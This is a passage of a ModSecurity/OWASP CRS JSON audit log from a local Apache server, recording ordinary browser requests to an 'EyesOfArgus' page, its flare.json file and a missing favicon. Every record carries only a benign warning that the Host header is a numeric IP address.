\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus\"] [unique_id \"WRc5J38AAQEAABzhe1QAAAAF\"]"],"handler":"httpd/unix-directory","stopwatch":{"p1":648,"p2":1100,"p3":69,"p4":401,"p5":120,"sr":41,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:43 --0400","transaction_id":"WRc5J38AAQEAABzhe1UAAAAF","remote_address":"127.0.0.1","remote_port":42720,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:49:39 GMT","ETag":"\"cca-54f6a9b9e1299-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1211","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc5J38AAQEAABzhe1UAAAAF\"]"],"stopwatch":{"p1":380,"p2":1066,"p3":62,"p4":369,"p5":58,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:44 --0400","transaction_id":"WRc5KH8AAQEAABzhe1YAAAAF","remote_address":"127.0.0.1","remote_port":42720,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:49:41 GMT","ETag":"\"295-54f6a9bb5c11f\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc5KH8AAQEAABzhe1YAAAAF\"]"],"stopwatch":{"p1":603,"p2":1594,"p3":83,"p4":211,"p5":91,"sr":23,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:44 --0400","transaction_id":"WRc5KH8AAQEAABzhe1cAAAAF","remote_address":"127.0.0.1","remote_port":42720,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc5KH8AAQEAABzhe1cAAAAF\"]"],"stopwatch":{"p1":506,"p2":1134,"p3":55,"p4":246,"p5":53,"sr":23,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:44 --0400","transaction_id":"WRc5KH8AAQEAABzhe1gAAAAF","remote_address":"127.0.0.1","remote_port":42720,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc5KH8AAQEAABzhe1gAAAAF\"]"],"stopwatch":{"p1":428,"p2":922,"p3":46,"p4":247,"p5":49,"sr":19,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:57:25 --0400","transaction_id":"WRc69X8AAQEAABwOGoAAAAAB","remote_address":"127.0.0.1","remote_port":43506,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:56:05 GMT","ETag":"\"ccc-54f6ab29ace5f-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc69X8AAQEAABwOGoAAAAAB\"]"],"stopwatch":{"p1":15638,"p2":3134,"p3":87,"p4":468,"p5":71,"sr":82,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:57:25 --0400","transaction_id":"WRc69X8AAQEAABwOGoEAAAAB","remote_address":"127.0.0.1","remote_port":43506,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc69X8AAQEAABwOGoEAAAAB\"]"],"stopwatch":{"p1":416,"p2":874,"p3":47,"p4":248,"p5":49,"sr":16,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:57:25 --0400","transaction_id":"WRc69X8AAQEAABwOGoIAAAAB","remote_address":"127.0.0.1","remote_port":43506,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc69X8AAQEAABwOGoIAAAAB\"]"],"stopwatch":{"p1":360,"p2":1789,"p3":69,"p4":450,"p5":49,"sr":15,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:57:49 --0400","transaction_id":"WRc7DX8AAQEAABwQSCIAAAAD","remote_address":"127.0.0.1","remote_port":43520,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1","If-Modified-Since":"Sat, 13 May 2017 16:56:05 GMT","If-None-Match":"\"ccc-54f6ab29ace5f-gzip\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:57:46 GMT","ETag":"\"ccc-54f6ab8a0710a-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1211","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc7DX8AAQEAABwQSCIAAAAD\"]"],"stopwatch":{"p1":638,"p2":967,"p3":108,"p4":494,"p5":66,"sr":33,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:57:50 --0400","transaction_id":"WRc7Dn8AAQEAABwQSCMAAAAD","remote_address":"127.0.0.1","remote_port":43520,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:57:47 GMT","ETag":"\"295-54f6ab8b53192\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc7Dn8AAQEAABwQSCMAAAAD\"]"],"stopwatch":{"p1":420,"p2":977,"p3":96,"p4":199,"p5":82,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:57:50 --0400","transaction_id":"WRc7Dn8AAQEAABwQSCQAAAAD","remote_address":"127.0.0.1","remote_port":43520,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this 